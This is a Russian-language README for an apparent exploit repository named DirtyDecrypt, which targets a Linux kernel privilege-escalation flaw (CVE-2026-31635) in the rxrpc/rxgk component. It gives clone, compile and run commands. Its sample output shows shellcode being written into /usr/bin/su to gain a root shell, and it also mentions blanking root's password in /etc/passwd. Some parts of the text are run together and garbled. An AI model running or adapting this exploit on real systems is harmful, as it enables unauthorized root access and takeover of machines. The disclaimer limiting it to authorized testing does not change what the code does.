
CVE-2026-31635
Локальное повышение привилегий в ядре Linux через повреждение кэша страниц RXGK
DirtyDecrypt (CVE-2026-31635) — это уязвимость локального повышения привилегий в подсистеме rxrpc ядра Linux (конкретно в компоненте rxgk).
Она злоупотребляет отсутствием проверки Copy-on-Write (COW) при расшифровке AES-CBC, позволяя непривилегированному пользователю повредить кэш страниц и добиться произвольной записи в файлы, что приводит к получению root-доступа.
/etc/passwd (пустой пароль root)CONFIG_RXGK=y)CONFIG_RXGK=nCONFIG_RXGKAF_RXRPCkeyctl (для ключей rxrpc)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
Ожидаемый успешный вывод:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] writing shellcode to /usr/bin/su (96 bytes from offset 0)
[========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restore: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # Главный эксплойт
├── README.md # Этот файл
├── Makefile # Опционально
└── exploit.log # Опциональный лог вывода
AF_RXRPC + splice() для принудительного направления страниц кэша страниц в путь расшифровки RXGKskb_cow_data()/etc/passwd) байт за байтом с использованием метода скользящего окнаДанный эксплойт предназначен только для образовательного и авторизованного тестирования безопасности.
Несанкционированное использование на системах, которые вам не принадлежат, является незаконным.
⭐ Поставьте звезду этому репозиторию, если он вам помог!
Сделано с ❤️ для сообщества исследователей